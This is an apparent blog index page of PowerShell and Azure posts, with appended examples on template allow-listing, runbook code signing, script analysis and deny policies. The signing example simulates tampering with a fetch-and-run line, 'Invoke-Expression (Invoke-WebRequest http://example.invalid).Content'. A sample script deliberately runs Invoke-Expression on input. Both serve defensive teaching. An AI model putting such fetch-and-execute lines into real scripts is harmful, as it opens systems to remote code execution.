My Journey to a Smarter Home (Part 2)

This is the 2nd part of the blog series. I covered my home network setup using Ubiquiti Unifi devices in part 1; you can find it here. In this part, I will discuss the home automation solutions I have put in place using various products from Xiaomi and their Mi Home ecosystem partners. My cousin is a HUGE Xiaomi fan. Back in 2013, during my holiday in China, he showed me his Xiaomi phone and the Mi Box. I “fell in love” with Xiaomi products ever since. Xiaomi is a fairly young company, only founded in 2010. It has

Continue reading

My Journey to a Smarter Home (Part 1)

Over the last month, I have published 8 blog posts. Right now, although I still have a few more on my to-do list, I’m just a bit over it. I want to write something different from my usual topics. I don’t know how many I am going to write right now, but I want to dedicate the next few posts to something that I have spent a lot of time on over the last couple of years – all the gadgets I have installed at home, especially around home automation. I will share my experience on the following product families:

Continue reading

Azure Policy to Restrict Storage Account Firewall Rules

Back in January 2018, I posted a custom Azure Policy definition that restricts the creation of public-facing storage accounts – in other words, if the storage account you are creating is not attached to a virtual network Service Endpoint, the policy engine will block the creation of that storage account. You can find the original post here: https://blog.tyang.org/2018/01/08/restricting-public-facing-azure-storage-accounts-using-azure-resource-policy/. When a storage account is connected to a Service Endpoint, you can also white-list one or more IP address ranges to allow them to access the storage account from outside your Azure virtual network (i.e. from the Internet). Therefore, in order

Continue reading

My Views on the Native Source Control Option in Azure Automation

A few weeks ago, I saw two separate discussions in different closed community channels regarding the Source Control option in Azure Automation accounts, more specifically, when support for VSTS will become available. In the Azure Portal, it has been showing “coming soon”. According to Wikipedia, “Visual Studio Online” was renamed to Visual Studio Team Services (VSTS) in November 2015: On 13 November 2013, Microsoft announced the release of a software as a service offering of Visual Studio on Microsoft Azure platform; at the time, Microsoft called it Visual Studio Online. Previously announced as Team Foundation Services,

Continue reading

Pester Test Your ARM Template in Azure DevOps CI Pipelines

Introduction
It is fair to say that I have spent a lot of time on Pester lately. I just finished a 12-month engagement with a financial institution here in Melbourne. During this engagement, everyone in the project team had to write tests for any patterns / pipelines they were developing. I once even wrote a standalone pipeline only to perform Pester tests. One of the scenarios we had to cater for was: how can you ensure the ARM template you are deploying only deploys the resources that you intended to deploy? In other words, if someone has gone rogue
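The check the excerpt describes, as an added example that is not code from the original post: a Pester test that fails the build when an ARM template declares resource types outside an explicit allow-list, walking nested resources and nested `Microsoft.Resources/deployments` templates too, because that is where a rogue resource would be tucked away. The template and the allow-list are constructed for this illustration (a pipeline would read the template from the repository), and the test uses Pester 4.x syntax.

```powershell
# Added example (not from the original post). The sample template, resource names and the
# allow-list are constructed for this illustration. Pester 4.x syntax.

# Walk the template recursively and return every resource type it would deploy,
# including resources nested under a parent resource or inside a nested deployment.
function Get-TemplateResourceType {
    param([Parameter(Mandatory)][object]$Template)
    foreach ($r in @($Template.resources)) {
        $r.type
        if ($r.resources) {
            Get-TemplateResourceType -Template @{ resources = $r.resources }
        }
        if ($r.type -eq 'Microsoft.Resources/deployments' -and $r.properties.template) {
            Get-TemplateResourceType -Template $r.properties.template
        }
    }
}

# Constructed sample: a storage account plus a nested deployment that sneaks in a VM.
$template = @'
{
  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    { "type": "Microsoft.Storage/storageAccounts", "apiVersion": "2018-07-01", "name": "stexample",
      "location": "australiasoutheast", "kind": "StorageV2", "sku": { "name": "Standard_LRS" } },
    { "type": "Microsoft.Resources/deployments", "apiVersion": "2018-05-01", "name": "inner",
      "properties": { "mode": "Incremental", "template": { "resources": [
        { "type": "Microsoft.Compute/virtualMachines", "apiVersion": "2018-06-01", "name": "vm1",
          "location": "australiasoutheast" }
      ] } } }
  ]
}
'@ | ConvertFrom-Json

# Assumed allow-list for this pattern: storage only (nested deployments allowed as a container).
$allowedTypes = @('Microsoft.Storage/storageAccounts', 'Microsoft.Resources/deployments')

Describe 'ARM template only deploys approved resource types' {
    $found = @(Get-TemplateResourceType -Template $template) | Sort-Object -Unique

    It 'declares at least one resource' {
        $found.Count | Should -BeGreaterThan 0
    }

    # One It per discovered type, so the failing type is named in the test results.
    foreach ($t in $found) {
        It "resource type '$t' is on the allow-list" {
            $allowedTypes -contains $t | Should -Be $true   # fails for Microsoft.Compute/virtualMachines
        }
    }
}
```

Run it with `Invoke-Pester` in the build pipeline and publish the NUnit output; the VM hidden in the nested deployment produces one named failure rather than silently deploying.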

Continue reading

Deploying PowerShell Modules to NuGet Feeds (Version 2) Using VSTS CI/CD Pipelines

It’s been 2 weeks since my last post. I was halfway through my list (of blogs to be written) when Melbourne was hit by a big cold wave; I was sick for over a week because of it, and with the recent VSTS outage, I only got a chance to finalise my code and demo for this post today.
Background
Last year, I posted an article on how to deploy PowerShell modules from GitHub to MyGet feeds using VSTS. I wasn’t really satisfied with what I did back then, and I had a requirement to develop several VSTS pipelines

Continue reading

Enforcing Code Signing for Azure Automation Runbooks on Hybrid Workers

Towards the end of last year, in order to solve a specific issue, we were planning to introduce Azure Automation Hybrid Workers at the customer I was working for at the time. We planned to place the Hybrid Workers inside the on-prem network and execute several runbooks that needed to run on-prem. The security team had some concerns – what if the Automation Accounts or Azure subscriptions get compromised? Then the bad guys could run malicious runbooks targeting on-prem machines. Long story short, in the end, we managed to get the Hybrid Worker pattern approved and implemented because we can configure
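The excerpt stops before naming the control. As an added example that is not code from the original post, the following assumes the usual way to enforce code signing on a Hybrid Worker: set the worker's PowerShell execution policy to AllSigned, so only runbooks carrying a valid Authenticode signature from a trusted publisher will run. The self-signed certificate, file names and runbook body are constructed for the illustration; in production the certificate would come from an internal CA and be placed in the worker's Trusted Publishers store.

```powershell
# Added example (not from the original post). Assumption: enforcement is the AllSigned
# execution policy on the hybrid worker. Certificate, paths and runbook body are constructed.
# Windows PowerShell 5.1, run as an administrator.

# 1. Code-signing certificate. Self-signed for the demo; it is NOT trusted until imported into
#    Cert:\LocalMachine\Root and Cert:\LocalMachine\TrustedPublisher on the worker.
$cert = New-SelfSignedCertificate -Type CodeSigningCert -Subject 'CN=Runbook Signing (demo)' `
            -CertStoreLocation 'Cert:\CurrentUser\My'

# 2. A runbook to sign. Authenticode signs files, so write it to disk first.
$runbookPath = Join-Path $env:TEMP 'Invoke-OnPremTask.ps1'
'Write-Output ("Running on {0}" -f $env:COMPUTERNAME)' | Set-Content -Path $runbookPath -Encoding UTF8

# 3. Sign it. The signature is appended as a comment block; any later byte change invalidates it.
Set-AuthenticodeSignature -FilePath $runbookPath -Certificate $cert | Out-Null

# 4. The check the PowerShell host performs under AllSigned before running the file.
function Test-RunbookSignature {
    param([Parameter(Mandatory)][string]$Path)
    $sig = Get-AuthenticodeSignature -FilePath $Path
    [pscustomobject]@{
        File   = Split-Path -Path $Path -Leaf
        Status = $sig.Status             # Valid | NotSigned | HashMismatch | UnknownError (untrusted chain)
        Signer = $sig.SignerCertificate.Subject
        Detail = $sig.StatusMessage
    }
}
Test-RunbookSignature -Path $runbookPath   # UnknownError until the demo cert is trusted, Valid after

# 5. Simulate what a compromised Automation Account could do: change the runbook after signing.
Add-Content -Path $runbookPath -Value 'Invoke-Expression (Invoke-WebRequest http://example.invalid).Content'
Test-RunbookSignature -Path $runbookPath   # HashMismatch: AllSigned refuses to run it

# 6. The enforcement itself, applied once per hybrid worker (or via Group Policy):
#    Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine
Get-ExecutionPolicy -List
```

Two caveats worth keeping in mind when presenting this to a security team: the execution policy is a host setting, not a security boundary (local administrators can change it, and it does nothing against code that never touches a .ps1 file), so it specifically closes the "push a new or edited runbook from a compromised Automation Account" path rather than everything; and the private key of the signing certificate becomes the thing to protect, so keep it off the Automation Account and off the workers.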

Continue reading

PowerShell Module: PSPesterTest

A few weeks ago, the customer I was working for had a requirement that all PowerShell scripts and in-house modules be validated against PSScriptAnalyzer in the build pipelines before being deployed to their Azure environments by the release pipelines. The validation had to be performed using Pester so the test results could be easily consumed in the VSTS projects (i.e. dashboards). Luckily, I found this blog post: https://blog.kilasuit.org/2016/03/29/invoking-psscriptanalyzer-in-pester-tests-for-each-rule/, so I used it as the starting point and created a PowerShell module that performs Pester tests by invoking PSScriptAnalyzer rules. I named this module PSPesterTest.
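The per-rule pattern in miniature, as an added example that is not the PSPesterTest module's own code: each PSScriptAnalyzer rule becomes its own `It` block, so the VSTS test results show exactly which rule failed and on which line. The script under test is constructed for this illustration and deliberately trips PSAvoidUsingPlainTextForPassword, PSAvoidUsingWriteHost and PSAvoidUsingInvokeExpression (among others, depending on the PSScriptAnalyzer version).

```powershell
# Added example (not the PSPesterTest module). The script under test is constructed for the
# illustration. Requires the Pester (4.x syntax) and PSScriptAnalyzer modules.

$scriptUnderTest = @'
function Connect-Thing {
    param([string]$Password, [string]$Command)
    Write-Host "Connecting with $Password"
    Invoke-Expression $Command
}
'@

# Run a single rule and return one "line:column message" string per finding.
function Get-RuleViolation {
    param(
        [Parameter(Mandatory)][string]$ScriptDefinition,
        [Parameter(Mandatory)][string]$RuleName
    )
    Invoke-ScriptAnalyzer -ScriptDefinition $ScriptDefinition -IncludeRule $RuleName |
        ForEach-Object { '{0}:{1} {2}' -f $_.Line, $_.Column, $_.Message }
}

Describe 'PSScriptAnalyzer rules' {
    # One test per rule, named after the rule and its severity.
    foreach ($rule in Get-ScriptAnalyzerRule) {
        It "passes $($rule.RuleName) ($($rule.Severity))" {
            $violations = @(Get-RuleViolation -ScriptDefinition $scriptUnderTest -RuleName $rule.RuleName)
            # Joining the findings puts line:column and message into the failure text
            ($violations -join '; ') | Should -BeNullOrEmpty
        }
    }
}
```

For a real module, replace `-ScriptDefinition` with `-Path` pointing at the module folder and add `-Recurse`; the structure stays the same.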

Continue reading

Azure Policy–Restrict NICs From Connecting to Particular Subnets

I wrote this policy definition for a customer a few weeks ago – to restrict VMs from connecting to particular subnets. The customer has several subnets that should not be used by VMs, e.g. the dedicated subnet for Azure ADDS (which is not associated with any NSG), or subnets that use different NSGs, which normal users should not be using. Since the intention was not to restrict users from using the entire VNet, only particular subnets, such a restriction could not be applied using custom role definitions. Here’s the policy definition:

It is also located in my GitHub repo: https://github.com/tyconsulting/azurepolicy/tree/master/policy-definitions/restrict-vm-nic-from-connecting-to-subnet. From

Continue reading

Azure Policy Definition – Restricting Public IP for NIC

It has been a while since my last blog post. There was a lot going on outside of work, I couldn’t find time to write, and my blog to-do list is getting longer. Finally things have settled down a little bit. I will try to tackle my list in the coming days. To get started, I will target the easiest ones first. A few weeks ago, I had to write several custom Azure Policy definitions for a customer. One of them restricts public IPs from being provisioned for VMs in particular resource groups. I found a similar definition from the
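The three policy posts on this page (storage account firewall rules, NICs in particular subnets, and public IPs on NICs) all use the same technique: a custom definition with a `deny` effect keyed on a resource alias. As an added example that is not the author's definitions from those posts or from the GitHub repo, here are all three built as PowerShell hashtables and registered with the Az module. Names, parameter descriptions and the subscription in the current Az context are illustrative, and the `count`/`where` expression used to test array members is newer than the 2018 posts.

```powershell
# Added example (not the definitions from the original posts). Policy names, display names
# and parameter metadata are assumptions. Requires Az.Resources and an authenticated Az
# context (Connect-AzAccount); the definitions land in the current subscription.

# Helper: wrap a condition and its parameters into a deny definition and register it.
function Register-DenyPolicy {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$DisplayName,
        [Parameter(Mandatory)][hashtable]$Condition,
        [hashtable]$Parameters = @{}
    )
    # 'if' is quoted because it is a PowerShell keyword; the JSON key is just "if".
    $rule = @{ 'if' = $Condition; 'then' = @{ effect = 'deny' } } | ConvertTo-Json -Depth 20
    New-AzPolicyDefinition -Name $Name -DisplayName $DisplayName -Mode 'All' `
        -Policy $rule -Parameter ($Parameters | ConvertTo-Json -Depth 10)
}

# 1. Restrict Public IP for NIC: deny a NIC if any of its IP configurations has a public IP.
Register-DenyPolicy -Name 'deny-nic-public-ip' -DisplayName 'Deny public IPs on network interfaces' -Condition @{
    allOf = @(
        @{ field = 'type'; equals = 'Microsoft.Network/networkInterfaces' }
        @{
            count = @{
                field = 'Microsoft.Network/networkInterfaces/ipConfigurations[*]'
                where = @{ field = 'Microsoft.Network/networkInterfaces/ipConfigurations[*].publicIpAddress.id'; exists = 'true' }
            }
            greater = 0
        }
    )
}

# 2. Restrict NICs from connecting to particular subnets (denied subnet IDs supplied at assignment).
Register-DenyPolicy -Name 'deny-nic-restricted-subnets' -DisplayName 'Deny NICs in restricted subnets' -Parameters @{
    deniedSubnetIds = @{ type = 'Array'; metadata = @{ description = 'Resource IDs of subnets VMs must not use' } }
} -Condition @{
    allOf = @(
        @{ field = 'type'; equals = 'Microsoft.Network/networkInterfaces' }
        @{
            count = @{
                field = 'Microsoft.Network/networkInterfaces/ipConfigurations[*]'
                where = @{ field = 'Microsoft.Network/networkInterfaces/ipConfigurations[*].subnet.id'; 'in' = "[parameters('deniedSubnetIds')]" }
            }
            greater = 0
        }
    )
}

# 3. Restrict storage account firewall rules: no firewall at all, a default action other than
#    Deny, or any IP rule outside the approved ranges is blocked.
Register-DenyPolicy -Name 'deny-storage-open-firewall' -DisplayName 'Deny storage accounts with open firewall rules' -Parameters @{
    allowedIpRanges = @{ type = 'Array'; metadata = @{ description = 'Public IP ranges (CIDR) allowed in storage firewall rules' } }
} -Condition @{
    allOf = @(
        @{ field = 'type'; equals = 'Microsoft.Storage/storageAccounts' }
        @{
            anyOf = @(
                @{ field = 'Microsoft.Storage/storageAccounts/networkAcls.defaultAction'; exists = 'false' }
                @{ field = 'Microsoft.Storage/storageAccounts/networkAcls.defaultAction'; notEquals = 'Deny' }
                @{
                    count = @{
                        field = 'Microsoft.Storage/storageAccounts/networkAcls.ipRules[*]'
                        where = @{ field = 'Microsoft.Storage/storageAccounts/networkAcls.ipRules[*].value'; notIn = "[parameters('allowedIpRanges')]" }
                    }
                    greater = 0
                }
            )
        }
    )
}
```

A definition does nothing until it is assigned (`New-AzPolicyAssignment` at the subscription, resource group, or management group scope, passing the array parameters), and `deny` only evaluates on create and update: resources that already violate the rule are reported as non-compliant, not changed. The `exists = 'false'` branch in the storage rule matters because a PUT without a `networkAcls` block is the default, wide-open case and would otherwise slip past the `notEquals` check.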

Continue reading